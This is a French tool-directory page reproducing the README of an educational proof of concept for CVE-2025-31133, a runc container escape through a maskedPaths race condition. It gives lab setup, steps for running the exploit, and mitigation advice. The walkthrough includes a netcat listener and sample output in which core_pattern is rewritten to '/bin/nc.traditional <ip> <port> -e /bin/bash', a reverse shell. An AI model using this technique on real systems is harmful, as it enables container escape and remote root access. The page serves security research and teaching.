Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Learn-about-cve-2025-31133-poc — Proof-of-concept éducatif pour CVE-2025-31133, une évasion de conteneur runc via une condition de concurrence sur maskedPaths. Comprend un laboratoire, un script d'exploitation et des conseils d'atténuation pour les chercheurs en sécurité. | Kitploit
Outils/GitHubGitHub/c-h4ck-0/learn-about-cve-2025-31133-poc
Sécurité des ConteneursAnalyse des VulnérabilitésExploitationApprentissage et ÉducationÉvasion de ConteneurLabs et Pratique
GitHubc-h4ck-0/learn-about-cve-2025-31133-poc

Learn-about-cve-2025-31133-poc

Proof-of-concept éducatif pour CVE-2025-31133, une évasion de conteneur runc via une condition de concurrence sur maskedPaths. Comprend un laboratoire, un script d'exploitation et des conseils d'atténuation pour les chercheurs en sécurité.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
238il y a 5 moisPas encore vérifié

Apprenez-en-plus-sur-cve-2025-31133-poc

Aperçu

Un environnement de démonstration et d'apprentissage de preuve de concept pour CVE-2025-31133, une vulnérabilité de sécurité dans runc qui permet de contourner la protection maskedPaths via une condition de concurrence. Les maskedPaths sont conçus pour empêcher les conteneurs d'accéder aux chemins sensibles du système de fichiers hôte.

https://github.com/user-attachments/assets/d7b4ea43-6cab-4ac5-bb07-08bc46479910

👉 Ce dépôt est un exemple pratique de l'état d'esprit et des techniques de recherche exactes enseignées dans la formation Black Hat :

Si cela vous intéresse, ce n'est que la partie émergée de l'iceberg.

Sécurité offensive des conteneurs : Un cours magistral pour repousser les limites

📅 Dates de formation Black Hat USA 2026 :

1er–2 août

https://blackhat.com/us-26/training/schedule/index.html#offensive-container-security-a-masterclass-in-breaking-the-boundaries-50910

3–4 août

https://blackhat.com/us-26/training/schedule/index.html#offensive-container-security-a-masterclass-in-breaking-the-boundaries-509101770251750

Détails de la vulnérabilité

  • ID CVE : CVE-2025-31133
  • Composant : runc (exécution de conteneurs)
  • Vecteur d'attaque : Condition de concurrence dans le traitement des maskedPaths
  • Impact : Évasion de conteneur

Comment ça fonctionne

L'exploit exploite une condition de concurrence où :

  1. Un conteneur est configuré avec maskedPaths pour protéger les fichiers sensibles (par exemple, /proc/sys/kernel/core_pattern)
  2. Pendant l'initialisation du conteneur, une condition de concurrence se produit entre :
    • La suppression d'un nœud de périphérique (/dev/null) dans le rootfs du conteneur
    • La recréation de ce nœud de périphérique
  3. Cette fenêtre temporelle permet de contourner la protection des chemins masqués
  4. Un attaquant peut écrire dans des fichiers protégés qui devraient être masqués

⚠️ Avertissement

Ce dépôt est uniquement à des fins éducatives.

  • Utilisez-le uniquement dans des environnements isolés et contrôlés
  • Ne l'utilisez pas contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de test
  • L'auteur n'est pas responsable de toute mauvaise utilisation de ce code
  • Cet exploit peut entraîner une instabilité du système ou une perte de données

Prérequis

  • Système Linux (Ubuntu recommandé)
  • Accès root/sudo
  • Connexion Internet
  • Compréhension de base des exécutions de conteneurs et de la sécurité

Installation

1. Clonez ou téléchargez ce dépôt

root@kitploit:~
git clone https://github.com/C-h4ck-0/Learn-about-cve-2025-31133-poc.git
cd Learn-about-cve-2025-31133-poc

2. Exécutez le script d'installation du laboratoire

Le script lab-setup.sh va :

  • Installer les dépendances
  • Installer une version vulnérable de runc v1.2.0
root@kitploit:~
chmod +x lab-setup.sh
./lab-setup.sh

3. Vérifiez l'installation

Vérifiez que la version vulnérable de runc est installée :

root@kitploit:~
runc --version

Vous devriez voir la version 1.2.0 ou similaire.

Exécution de l'exploit

Utilisation de base

  1. Démarrez un écouteur sur votre machine attaquante pour recevoir le reverse shell :
root@kitploit:~
nc -lnvp <PORT>
  1. Exécutez le script d'exploitation :
root@kitploit:~
chmod +x cve-2025-31133-exploit.sh
./cve-2025-31133-exploit.sh
  1. Fournissez les informations requises lorsque vous y êtes invité :
    • Adresse IP de l'attaquant
    • Port de l'attaquant (où votre écouteur est en cours d'exécution)

Sortie attendue

En cas de succès, vous devriez voir :

root@kitploit:~
[*] Compiling race condition exploit binary...
[*] Starting exploit attempts...
[*] Target: /proc/sys/kernel/core_pattern
[*] Backing up /proc/sys/kernel/core_pattern...
[*] Backup created at /tmp/core_pattern.bak
[*] Current content of target:
|/usr/share/apport/apport -p%p -s%s -c%c -d%d -P%P -u%u -g%g -F%F -- %E

====================================================
[*] Testing delay: 5 microseconds
====================================================
X..
[+] ========================================
[+] SUCCESS! Exploit succeeded.
[+] ========================================
[+] Original content:
|/usr/share/apport/apport -p%p -s%s -c%c -d%d -P%P -u%u -g%g -F%F -- %E
------------------------------------------------
[+] Modified content:
|/bin/nc.traditional <ip-address> <port> -e /bin/bash
------------------------------------------------
./exploit.sh: line 148:  7068 Segmentation fault      (core dumped) sleep 5
[*] Restoring original content...
[*] Restoration complete.

Une connexion reverse shell devrait être établie avec votre écouteur.

Atténuation

Pour se protéger contre cette vulnérabilité :

  1. Mettez à jour runc vers une version corrigée (v1.2.1 ou ultérieure)
  2. Maintenez les exécutions de conteneurs à jour régulièrement
  3. Utilisez le principe du moindre privilège - exécutez les conteneurs dans un espace de noms utilisateur non root

Références

  • archive de liste de diffusion
  • Dépôt GitHub du PoC de vulnérabilité

Remarques

  • L'exploit peut nécessiter plusieurs tentatives pour réussir en raison de la nature de la condition de concurrence
  • Le taux de réussite dépend de la charge du système et du timing
  • Le script restaure automatiquement le core_pattern d'origine après une exploitation réussie
  • Le nettoyage est géré automatiquement via des gestionnaires de piège (trap)

Licence

Ce projet est fourni à des fins éducatives. Utilisez-le de manière responsable et éthique.


Rappelez-vous : Utilisez toujours les outils de recherche en sécurité de manière responsable et uniquement dans des environnements que vous possédez ou pour lesquels vous avez une autorisation explicite de test.

Télécharger l’outil